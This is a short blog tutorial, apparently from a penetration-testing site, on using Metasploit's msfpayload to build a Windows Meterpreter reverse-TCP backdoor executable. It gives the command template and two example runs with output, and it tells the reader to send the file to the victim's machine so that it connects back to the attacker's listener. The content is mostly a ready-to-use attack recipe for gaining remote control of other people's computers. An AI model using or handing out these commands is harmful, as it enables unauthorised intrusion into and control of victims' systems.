Creating an executable backdoor with Metasploit

You can create an executable backdoor with Metasploit using the msfpayload command, the following steps show you the process.

You can do this from Metasploit or from your Linux prompt, in both cases the command is the same:

# msfpayload windows/meterpreter/reverse_tcp lhost=<Listening_IP> lport=<Listening_Port> x > backdoor.exe

Where Listening_IP is the IP of the server that is waiting the connection from the backdoor, for example, if you are using Backtrack to attack a machine, you have to configure the Backtrack IP in your  backdoor, then send it to the victim’s machine and it gets executed the backdoor will connect back to your Backtrack in the Listening_Port.

Example:

[root@tmcent01 ~]# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.5.55 lport=4444 x > backdoor.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {“lhost”=>”192.168.5.55”, “lport”=>”4444”}

The backdoor.exe file is saved in the path where you executed the command.

The following example shows the same command but this time executed from Metasploit, the result is the same:

msf > msfpayload windows/meterpreter/reverse_tcp lhost=192.168.5.55 lport=4444 x > backdoor.exe
[*] exec: msfpayload windows/meterpreter/reverse_tcp lhost=192.168.5.55 lport=4444 x > backdoor.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {“lhost”=>”192.168.5.55”, “lport”=>”4444”}

Once you have the backdoor you’ll have to start a handler where you’ll be able to listen and control the victim. To start the handler you can visit our port Starting a Handler with Metasploit.

You can also send us your comments and questions to our Twitter account: @redinskala where you can find more info and security tips.

 

One thought on “Creating an executable backdoor with Metasploit

  1. Pingback: Starting a handler with Metasploit | RedinSkala

Comments are closed.